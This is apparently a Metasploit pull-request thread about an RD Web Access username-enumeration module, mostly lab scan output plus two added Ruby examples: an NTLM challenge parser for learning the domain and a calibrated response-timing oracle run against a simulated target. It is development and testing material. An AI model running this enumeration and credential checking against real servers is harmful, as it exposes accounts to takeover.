[+] Password wrong is invalid but testdomain\rje is valid! Response received in 59.073 milliseconds
[+] Password wrong is invalid but testdomain\root is valid! Response received in 60.427 milliseconds
[+] Password wrong is invalid but testdomain\ROOT is valid! Response received in 57.261 milliseconds
[+] Password wrong is invalid but testdomain\rooty is valid! Response received in 62.071 milliseconds
[+] Password wrong is invalid but testdomain\rpc is valid! Response received in 73.715 milliseconds
[+] Password wrong is invalid but testdomain\rpcuser is valid! Response received in 76.684 milliseconds
[+] Password wrong is invalid but testdomain\rtkit is valid! Response received in 59.623 milliseconds
[+] Password wrong is invalid but testdomain\rwhod is valid! Response received in 59.785 milliseconds
[+] Password wrong is invalid but testdomain\saned is valid! Response received in 65.095 milliseconds
[+] Password wrong is invalid but testdomain\service is valid! Response received in 69.969 milliseconds
[+] Password wrong is invalid but testdomain\setroubleshoot is valid! Response received in 59.042 milliseconds
[+] Password wrong is invalid but testdomain\setup is valid! Response received in 58.74 milliseconds
[+] Password wrong is invalid but testdomain\sgiweb is valid! Response received in 59.75 milliseconds
[+] Password wrong is invalid but testdomain\shutdown is valid! Response received in 58.715 milliseconds
[+] Password wrong is invalid but testdomain\sigver is valid! Response received in 57.914 milliseconds
[+] Password wrong is invalid but testdomain\speech-dispatcher is valid! Response received in 61.399 milliseconds
[+] Password wrong is invalid but testdomain\sshd is valid! Response received in 61.376 milliseconds
[+] Password wrong is invalid but testdomain\sslh is valid! Response received in 61.328 milliseconds
[+] Password wrong is invalid but testdomain\sssd is valid! Response received in 61.79 milliseconds
[+] Password wrong is invalid but testdomain\stunnel4 is valid! Response received in 58.916 milliseconds
[+] Password wrong is invalid but testdomain\sym is valid! Response received in 59.229 milliseconds
[+] Password wrong is invalid but testdomain\symop is valid! Response received in 60.117 milliseconds
[+] Password wrong is invalid but testdomain\sync is valid! Response received in 57.147 milliseconds
[+] Password wrong is invalid but testdomain\sys is valid! Response received in 62.307 milliseconds
[+] Password wrong is invalid but testdomain\sysadm is valid! Response received in 80.249 milliseconds
[+] Password wrong is invalid but testdomain\sysadmin is valid! Response received in 69.735 milliseconds
[+] Password wrong is invalid but testdomain\sysbin is valid! Response received in 76.288 milliseconds
[+] Password wrong is invalid but testdomain\syslog is valid! Response received in 61.336 milliseconds
[+] Password wrong is invalid but testdomain\system_admin is valid! Response received in 60.093 milliseconds
[+] Password wrong is invalid but testdomain\systemd-bus-proxy is valid! Response received in 59.093 milliseconds
[+] Password wrong is invalid but testdomain\systemd-coredump is valid! Response received in 65.794 milliseconds
[+] Password wrong is invalid but testdomain\systemd-network is valid! Response received in 57.628 milliseconds
[+] Password wrong is invalid but testdomain\systemd-resolve is valid! Response received in 58.787 milliseconds
[+] Password wrong is invalid but testdomain\systemd-timesync is valid! Response received in 58.546 milliseconds
[+] Password wrong is invalid but testdomain\tcpdump is valid! Response received in 61.867 milliseconds
[+] Password wrong is invalid but testdomain\trouble is valid! Response received in 58.933 milliseconds
[+] Password wrong is invalid but testdomain\tss is valid! Response received in 59.5 milliseconds
[+] Password wrong is invalid but testdomain\udadmin is valid! Response received in 64.178 milliseconds
[+] Password wrong is invalid but testdomain\ultra is valid! Response received in 72.905 milliseconds
[+] Password wrong is invalid but testdomain\umountfs is valid! Response received in 61.497 milliseconds
[+] Password wrong is invalid but testdomain\umountfsys is valid! Response received in 59.133 milliseconds
[+] Password wrong is invalid but testdomain\umountsys is valid! Response received in 60.869 milliseconds
[+] Password wrong is invalid but testdomain\unix is valid! Response received in 59.312 milliseconds
[+] Password wrong is invalid but testdomain\unscd is valid! Response received in 59.459 milliseconds
[+] Password wrong is invalid but testdomain\us_admin is valid! Response received in 76.102 milliseconds
[+] Password wrong is invalid but testdomain\usbmux is valid! Response received in 62.765 milliseconds
[+] Password wrong is invalid but testdomain\user is valid! Response received in 71.429 milliseconds
[+] Password wrong is invalid but testdomain\uucp is valid! Response received in 76.316 milliseconds
[+] Password wrong is invalid but testdomain\uucpadm is valid! Response received in 60.484 milliseconds
[+] Password wrong is invalid but testdomain\uuidd is valid! Response received in 60.936 milliseconds
[+] Password wrong is invalid but testdomain\vagrant is valid! Response received in 76.194 milliseconds
[+] Password wrong is invalid but testdomain\varnish is valid! Response received in 60.492 milliseconds
[+] Password wrong is invalid but testdomain\web is valid! Response received in 61.06 milliseconds
[+] Password wrong is invalid but testdomain\webmaster is valid! Response received in 59.285 milliseconds
[+] Password wrong is invalid but testdomain\whoopsie is valid! Response received in 60.843 milliseconds
[+] Password wrong is invalid but testdomain\www is valid! Response received in 62.338 milliseconds
[+] Password wrong is invalid but testdomain\www-data is valid! Response received in 62.887 milliseconds
[+] Password wrong is invalid but testdomain\xpdb is valid! Response received in 57.389 milliseconds
[+] Password wrong is invalid but testdomain\xpopr is valid! Response received in 73.649 milliseconds
[+] Password wrong is invalid but testdomain\zabbix is valid! Response received in 62.042 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@k0pak4
Copy link
Contributor Author

k0pak4 commented Feb 22, 2021

OK; back up and running. Now, I'm still not getting the timing. I've got the web_rdp running on a separate VM from the DC, and the timing just does not seem to be there:
Output

@bwatters-r7 I'm trying to think of other things that might be causing the difference. Are any of the ones you're using supposed to be valid? I suspected the Administrator one likely was. Based on the output you input the domain yourself, does the domain discovery feature work on this host?

@bwatters-r7
Copy link
Contributor

@k0pak4 I know Administrator is valid. Also, no, apparently the domain discovery does not work, either?

msf6 auxiliary(scanner/http/rdp_web_login) > show options

Module options (auxiliary/scanner/http/rdp_web_login):

   Name            Current Setting                                                       Required  Description
   ----            ---------------                                                       --------  -----------
   RHOSTS          192.168.132.184                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS         1                                                                     yes       The number of concurrent threads (max one per host)
   domain                                                                                no        The target AD domain
   enum_domain     true                                                                  no        Automatically enumerate AD domain using NTLM
   password                                                                              no        The password to try or path to a file of passwords
   rport           443                                                                   yes       Port to target
   targeturi       /RDWeb/Pages/en-US/login.aspx                                         yes       The base path to the RDP Web Client install
   timeout         1250                                                                  yes       Response timeout in milliseconds to consider username invalid
   user_agent      Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  no        User Agent string to use, defaults to Firefox
   username        Administrator                                                         yes       The username to verify or path to a file of usernames
   verify_service  true                                                                  no        Verify the service is up before performing login scan

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.184...
[*] 192.168.132.184 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[+] Service is up, beginning scan...
[*] 192.168.132.184 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[-] Failed to find Domain
[-] Either domain or enum_domain must be set to continue, aborting...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > 

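The failed domain discovery above depends on an NTLM challenge coming back from the target: the module's `enum_domain` option says it enumerates the AD domain "using NTLM", and the NetBIOS domain name lives in the TargetInfo AV pairs of the NTLM CHALLENGE_MESSAGE (Type 2, MS-NLMP 2.2.1.2). The block below is an added example, not the module's code. It parses that challenge and pulls out the domain; it does not send the HTTP request itself, and which endpoint the module targets (bwatters mentions enabling RPC over HTTP) is not stated on this page, so the `build_type2` message used as input here is constructed for offline use and is not a real capture.

```ruby
# NTLM CHALLENGE_MESSAGE (Type 2) layout, MS-NLMP 2.2.1.2:
#   0  Signature "NTLMSSP\0"        8  MessageType (=2)
#   12 TargetNameFields (len,max,off) 20 NegotiateFlags
#   24 ServerChallenge (8)           32 Reserved (8)
#   40 TargetInfoFields (len,max,off) 48 Version (8)
#   56 payload: TargetName, TargetInfo (AV pairs: AvId(2) AvLen(2) Value)
AV_IDS = {
  1 => :nb_computer_name, 2 => :nb_domain_name,
  3 => :dns_computer_name, 4 => :dns_domain_name, 5 => :dns_tree_name
}.freeze

module NtlmDomain
  SIGNATURE = "NTLMSSP\x00".b

  # Return the AV pairs of a raw Type 2 blob as { symbol => UTF-8 string }.
  def self.target_info(blob)
    blob = blob.b
    raise ArgumentError, 'not an NTLM message' unless blob[0, 8] == SIGNATURE
    type = blob[8, 4].unpack1('V')
    raise ArgumentError, "expected type 2, got #{type}" unless type == 2
    ti_len, _ti_max, ti_off = blob[40, 8].unpack('vvV')
    raise ArgumentError, 'TargetInfo out of bounds' if ti_off + ti_len > blob.bytesize
    pairs = {}
    pos = ti_off
    loop do
      raise ArgumentError, 'truncated AV pair' if pos + 4 > blob.bytesize
      av_id, av_len = blob[pos, 4].unpack('vv')
      pos += 4
      break if av_id.zero? # MsvAvEOL terminates the list
      value = blob[pos, av_len].force_encoding('UTF-16LE').encode('UTF-8')
      pairs[AV_IDS.fetch(av_id, av_id)] = value
      pos += av_len
    end
    pairs
  end

  # Convenience: parse a "WWW-Authenticate: NTLM <base64>" header value.
  def self.from_header(header)
    m = header.match(%r{\ANTLM\s+([A-Za-z0-9+/=]+)\z})
    raise ArgumentError, 'not an NTLM challenge header' unless m
    target_info(m[1].unpack1('m0'))
  end

  # The value the domain-discovery step is after: NetBIOS domain first,
  # DNS domain as a fallback, nil when the server sent neither.
  def self.domain_from(blob)
    info = target_info(blob)
    info[:nb_domain_name] || info[:dns_domain_name]
  end
end

# Constructed Type 2 message for offline testing (challenge and version
# values are made up; nothing here is a capture from a real host).
def build_type2(nb_domain:, nb_host:, dns_domain:)
  av = ''.b
  { 2 => nb_domain, 1 => nb_host, 4 => dns_domain }.each do |id, v|
    u = v.encode('UTF-16LE').b
    av << [id, u.bytesize].pack('vv') << u
  end
  av << [0, 0].pack('vv') # MsvAvEOL
  header_len = 56
  target_name = nb_domain.encode('UTF-16LE').b
  flags = 0x1 | 0x4 | 0x200 | 0x10000 | 0x800000 | 0x2000000 # UNICODE|REQUEST_TARGET|NTLM|TARGET_TYPE_DOMAIN|TARGET_INFO|VERSION
  msg = "NTLMSSP\x00".b
  msg << [2].pack('V')
  msg << [target_name.bytesize, target_name.bytesize, header_len].pack('vvV')
  msg << [flags].pack('V')
  msg << "\x01\x23\x45\x67\x89\xab\xcd\xef".b # ServerChallenge (constructed)
  msg << ("\x00" * 8).b                        # Reserved
  msg << [av.bytesize, av.bytesize, header_len + target_name.bytesize].pack('vvV')
  msg << [6, 1, 7601, 0, 0, 0, 15].pack('CCvCCCC') # Version (constructed)
  msg << target_name << av
end

if __FILE__ == $PROGRAM_NAME
  blob = build_type2(nb_domain: 'TESTDOMAIN', nb_host: 'RDWEB01', dns_domain: 'testdomain.local')
  puts "Found Domain: #{NtlmDomain.domain_from(blob)}"
end
```

If the endpoint never returns a `WWW-Authenticate: NTLM` challenge (for instance because the RDWeb host cannot reach a DC, as in this thread), there is no Type 2 to parse and the domain has to be supplied with `set domain`.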
@bwatters-r7
Copy link
Contributor

Hey- found the issue. My DC migrated into another network, so the rdp server could not talk to it, and to get the domain autodetect working, I enabled the rpc over http feature.
After some checking, it appears that in my environment, the magic timeout was about 500 milliseconds. The valid responses came in around 30-40 milliseconds, but the invalid usernames took about 700 milliseconds.

msf6 auxiliary(scanner/http/rdp_web_login) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.192...
[+] Service is up, beginning scan...
[+] Found Domain: TESTDOMAIN
[+] Password wrong is invalid but TESTDOMAIN\ is valid! Response received in 37.164 milliseconds
[-] Login TESTDOMAIN\4Dgifts:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\abrt:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\adm:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\admin:wrong is invalid! No response received in 500 milliseconds
[+] Password wrong is invalid but TESTDOMAIN\administrator is valid! Response received in 47.277 milliseconds
[-] Login TESTDOMAIN\anon:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\_apt:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\arpwatch:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\auditor:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\avahi:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\avahi-autoipd:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\backup:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\bbs:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\beef-xss:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\bin:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\bitnami:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\checkfs:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\checkfsys:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\checksys:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\chronos:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\chrony:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\cmwlogin:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\cockpit-ws:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\colord:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\couchdb:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\cups-pk-helper:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\daemon:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\dbadmin:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\dbus:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\Debian-exim:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\Debian-snmp:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\demo:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\demos:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\diag:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\distccd:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\dni:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\dnsmasq:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\dradis:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\EZsetup:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\fal:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\fax:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\ftp:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\games:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\gdm:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\geoclue:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\gnats:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\gnome-initial-setup:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\gopher:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\gropher:wrong is invalid! No response received in 500 milliseconds
[+] Password wrong is invalid but TESTDOMAIN\guest is valid! Response received in 31.826 milliseconds
[+] Password wrong is invalid but TESTDOMAIN\msfuser is valid! Response received in 41.892 milliseconds
[-] Login TESTDOMAIN\haldaemon:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\halt:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\hplip:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\inetsim:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\informix:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\install:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\iodine:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\irc:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\jet:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\karaf:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\kernoops:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\king-phisher:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\landscape:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\libstoragemgmt:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\libuuid:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\lightdm:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\list:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\listen:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\lp:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\lpadm:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\lpadmin:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\lxd:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\lynx:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\mail:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\man:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\me:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\messagebus:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\miredo:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\mountfs:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\mountfsys:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\mountsys:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\mysql:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\news:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\noaccess:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\nobody:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\nobody4:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\ntp:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\nuucp:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\nxautomation:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\nxpgsql:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\omi:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\omsagent:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\operator:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\oracle:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\OutOfBox:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\pi:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\polkitd:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\pollinate:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\popr:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\postfix:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\postgres:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\postmaster:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\printer:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\proxy:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\pulse:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\redsocks:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\rfindd:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\rje:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\root:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\ROOT:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\rooty:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\rpc:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\rpcuser:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\rtkit:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\rwhod:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\saned:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\service:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\setroubleshoot:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\setup:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sgiweb:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\shutdown:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sigver:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\speech-dispatcher:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sshd:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sslh:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sssd:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\stunnel4:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sym:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\symop:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sync:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sys:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sysadm:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sysadmin:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\sysbin:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\syslog:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\system_admin:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\systemd-bus-proxy:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\systemd-coredump:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\systemd-network:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\systemd-resolve:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\systemd-timesync:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\tcpdump:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\trouble:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\tss:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\udadmin:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\ultra:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\umountfs:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\umountfsys:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\umountsys:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\unix:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\unscd:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\us_admin:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\usbmux:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\user:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\uucp:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\uucpadm:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\uuidd:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\vagrant:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\varnish:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\web:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\webmaster:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\whoopsie:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\www:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\www-data:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\xpdb:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\xpopr:wrong is invalid! No response received in 500 milliseconds
[-] Login TESTDOMAIN\zabbix:wrong is invalid! No response received in 500 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > creds
Credentials
===========

host             origin           service          public         private  realm       private_type  JtR Format
----             ------           -------          ------         -------  -----       ------------  ----------
192.168.132.192  192.168.132.192  443/tcp (RDWeb)  msfuser                 TESTDOMAIN                
192.168.132.192  192.168.132.192  443/tcp (RDWeb)  guest                   TESTDOMAIN                
192.168.132.192  192.168.132.192  443/tcp (RDWeb)  administrator           TESTDOMAIN                
192.168.132.192  192.168.132.192  443/tcp (RDWeb)                          TESTDOMAIN                

msf6 auxiliary(scanner/http/rdp_web_login) > set username msfuser
username => msfuser
msf6 auxiliary(scanner/http/rdp_web_login) > set password v3Mpassword
password => v3Mpassword
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.192...
[+] Service is up, beginning scan...
[+] Found Domain: TESTDOMAIN
[+] Login TESTDOMAIN\msfuser:v3Mpassword is valid!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > creds
Credentials
===========

host             origin           service          public         private      realm       private_type  JtR Format
----             ------           -------          ------         -------      -----       ------------  ----------
192.168.132.192  192.168.132.192  443/tcp (RDWeb)  msfuser                     TESTDOMAIN                
192.168.132.192  192.168.132.192  443/tcp (RDWeb)  msfuser        v3Mpassword  TESTDOMAIN  Password      
192.168.132.192  192.168.132.192  443/tcp (RDWeb)  guest                       TESTDOMAIN                
192.168.132.192  192.168.132.192  443/tcp (RDWeb)  administrator               TESTDOMAIN                
192.168.132.192  192.168.132.192  443/tcp (RDWeb)                              TESTDOMAIN                

msf6 auxiliary(scanner/http/rdp_web_login) > 

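The run above shows why the module's `timeout` option needs tuning per environment: in this lab invalid usernames took about 700 ms and valid ones 30 to 50 ms, so a 500 ms cut-off separated them, while the default of 1250 ms did not. The block below is an added example, not the module's code. It calibrates the cut-off from usernames that cannot exist and then classifies candidates against it; the `probe` callable stands in for the login POST and returns only the observed latency, and `SIMULATED_RDWEB` is a constructed stand-in shaped after the latencies in this thread, not a real target.

```ruby
require 'securerandom'

# Timing oracle for RDWeb user enumeration: a login for a user that does not
# exist stalls while the server consults the DC, while a valid user with a
# wrong password is rejected quickly. `probe` is any callable that takes a
# username and returns the round-trip time in milliseconds.
module RdwebTiming
  Result = Struct.new(:username, :latency_ms, :valid)

  def self.median(values)
    sorted = values.sort
    mid = sorted.length / 2
    sorted.length.odd? ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2.0
  end

  # Measure the 'nonexistent user' latency with random usernames that cannot
  # exist, then place the timeout at `fraction` of its median. Refuse to
  # calibrate when the samples are too noisy for the oracle to be trusted.
  def self.calibrate_timeout(probe, samples: 5, fraction: 0.7)
    latencies = Array.new(samples) { probe.call("nx-#{SecureRandom.hex(6)}") }
    base = median(latencies)
    spread = latencies.max - latencies.min
    raise "unstable baseline #{latencies.inspect}" if spread > base * 0.5
    (base * fraction).round
  end

  # Classify candidates: a reply before the timeout means the name was
  # rejected without the slow lookup, i.e. the account exists.
  def self.enumerate(probe, usernames, timeout_ms, samples: 1)
    usernames.map do |u|
      lat = median(Array.new(samples) { probe.call(u) })
      Result.new(u, lat, lat < timeout_ms)
    end
  end
end

# Constructed stand-in for the target (valid ~35-50 ms, invalid ~700-715 ms),
# modelled on the numbers reported in this thread. Not a real capture.
KNOWN_USERS = %w[administrator guest msfuser].freeze
SIMULATED_RDWEB = lambda do |username|
  jitter = rand(0..15)
  KNOWN_USERS.include?(username.downcase) ? 35 + jitter : 700 + jitter
end

if __FILE__ == $PROGRAM_NAME
  timeout = RdwebTiming.calibrate_timeout(SIMULATED_RDWEB)
  puts "calibrated timeout: #{timeout} ms"
  RdwebTiming.enumerate(SIMULATED_RDWEB, %w[administrator wrong msfuser], timeout).each do |r|
    puts "#{r.valid ? '[+]' : '[-]'} #{r.username} (#{r.latency_ms} ms)"
  end
end
```

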